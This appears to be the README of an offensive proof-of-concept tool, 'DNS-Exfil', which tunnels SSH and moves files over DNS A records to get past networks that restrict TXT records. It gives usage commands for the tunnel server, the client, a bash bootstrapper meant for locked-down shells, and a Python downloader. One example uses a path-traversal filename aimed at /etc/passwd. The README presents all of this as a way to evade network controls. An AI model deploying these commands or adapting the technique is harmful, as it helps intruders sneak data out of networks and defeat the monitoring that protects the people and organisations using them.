# DNS-Exfil
PoC DNS exfiltration tool with bash bootstrap and file transfer functions using A records
exclusively. this will bypass a lot of systems that have restricted TXT records.

the tool has been written to conform pretty closely to ansi C and should build
under any OS that supports a posix-y gethostbyname() function


the dns tunnel server is intended to run on a server which can be the
the SOA for a domain or subdomain.

on the server:
# python dnstun.py --domain [SOA record name]

on the client:
$ ./client -s [SOA record name]


which will let you SSH to the SSH port on the server host (by default, but configurable):
$ ssh localhost -p 2093



downloading a file name "test" from the server using the bash bootstrapper, this is intended to be used
in places where you might only have keyboard or shell access with few tools, this script should even work
with busybox assuming it supports all of the dependencies (awk, ping) but you could easily modify this
to get the job done with our simple bootstrap downloader. One note about the "simple" method is that the file
name should only contain a-z,A-Z,0-9,-_ in its filename, a "." extenstion will fuck everything up in this mode

$./bootstrap_file_transfer.sh [SOA record name] [filename]


if you dont mind typing a bit more, and have python on the system, you can use the filedl.py script
to more quickly download a file as it makes use of multiple A recorcs unlike the "simple method". You
can also use any filename using this method since the filename is encoded during transit

$python filedl.py  -d [SOA record name] -f "../../../../../../../etc/passwd"


files are stored on the server in the "files" subdirectory from the server script..

now go.. tunnel..